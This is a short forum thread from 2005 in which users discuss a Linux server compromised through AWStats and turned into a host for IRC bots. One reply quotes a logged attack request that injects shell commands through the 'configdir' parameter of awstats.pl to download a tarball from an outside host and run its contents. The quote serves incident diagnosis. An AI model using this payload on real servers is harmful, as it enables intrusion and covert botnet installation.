Menu

hacking

2005-08-03
2012-10-11
  • Nobody/Anonymous

    2 weeks running awstats on my linux server and I am hacked.
    somebody manage to get a perl script into awstats and ups, my server is supporting 12 irc bots.

     
    • Nobody/Anonymous

      I don't think it necessarily means awstats was the entry point. Maybe the person already had ftp access and the awstats cgi-bin was the place where the hacker had exec permissions. If he was dumb enough it is possible he left the logs intact, did you find anything there ?

       
    • Nobody/Anonymous

      awstats.pl can be used to drop IRC-Bots using the "configdir" argument.

      I just discovered so.
      "GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20www%2eirc%2dbots%2eorg%2f
      x%2etar%2egz%3btar%20xvzf%20x%2etar%2egz%3bcd%20x%3b%2e%2fcrond%3becho%20e_exp%3b%2500 HTTP/1.1"

       
    • Rick DeNatale

      Rick DeNatale - 2005-08-12
       

Log in to post a comment.

MongoDB Logo MongoDB